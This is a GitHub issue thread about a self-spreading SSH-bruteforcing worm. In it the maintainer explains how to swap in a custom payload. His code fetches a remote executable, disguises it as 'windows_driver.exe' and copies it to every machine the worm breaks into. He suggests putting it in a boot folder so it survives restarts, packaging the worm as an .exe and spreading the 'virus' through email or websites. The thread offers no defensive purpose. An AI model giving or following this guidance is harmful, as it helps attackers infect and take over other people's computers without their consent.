### ISSUE TITLE
How to add your own Payload

### ISSUE THREAD

**Issue by iii235** [pylyf/NetWorm#5]
How can you switch the payload to something different? (For Educational purposes)

**Comment by pylyf** [comment]
Hi,
You can implement the payload however you want.
For example, you can download the payload from a website like this:
```
    url = "https://example.com/payload.exe"
    #download the file and save it as "windows_driver.exe"
    urllib.request.urlretrieve(url, "windows_driver.exe") 
```
Then, under the `connect_to_ssh` function ( main.py ), you edit the following line with the name of the payload we downloaded. This function will save the payload on every machine the worm successfully bruteforces using the ssh protocol.

` sftp.put('windows_driver.exe', "path") # Change "path" to whatever folder you want`

Then, you execute the payload file or you can save it for example to the boot folder so that it is executed every time the computer starts.

I hope that my explanation is easy to understand. Make sure to ask if you need more clarification.

**Comment by Delaspaingg** [comment]
Hi, 
How is it a PY archive, how can I "Infect" other computers?

**Comment by pylyf** [comment]
Hi @Delaspaingg,
If you want to execute a python script on different computers, you can convert the .py file into a an executable (.exe) file using many tools.

I personally use [PyInstaller](https://pypi.org/project/PyInstaller/) but there are other alternatives like [py2exe](https://www.py2exe.org/index.cgi/Tutorial).

After you convert your script to an executable, you can double click and open it on any computer.
You will be able to spread your virus through emails, websites, or in your own different creative way.

Cheers.
